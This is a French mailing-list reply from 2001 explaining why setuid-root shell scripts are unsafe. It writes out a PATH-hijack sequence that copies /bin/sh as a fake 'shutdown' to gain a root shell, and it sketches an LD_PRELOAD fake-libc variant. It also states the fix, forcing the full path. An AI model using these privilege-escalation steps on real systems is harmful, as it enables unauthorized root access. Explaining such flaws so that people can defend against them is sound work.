At 10:46 23/03/2001 +0100, you wrote: > > Ca ne represente pas un emmental de securite ? > > > Si, en effet. > >Je ne suis pas un expert en securite, mais si qqn peut m'expliquer >comment detourner un script setuid root, ou il y aurait juste >"shutdown -r now" ca m'interese.
Y'a qu'� demander. Supposant que ton script s'appelle usershut.sh $ export PATH=.:$PATH $ cp /bin/sh shutdown $ chmod 0777 shutdown $ usershut.sh # ... Bon, je suis pas s�r que bash se laisse faire ainsi mais un petit prg C fera parfaitement l'affaire. Bien s�r, la parade consiste � forcer le path de shutdown mais tu vois qu'on peut facilement oublier un truc. Tu veux un autre exemple ? Les variables LD_ contr�lent les chemins vers les librairies partag�es. Tu cr�es une libc bidon, tu la mets en preload et tu lances le script et shbunk. Eric. [ Soyez pr�cis dans vos sujets svp afin de d�terminer directement ] [ le type de demande... ] [ Pour vous (d�s)inscrire, aller sur http://linuxbe.org/ml.php ] [ http://LinuxBe.org Contact: [EMAIL PROTECTED] ]
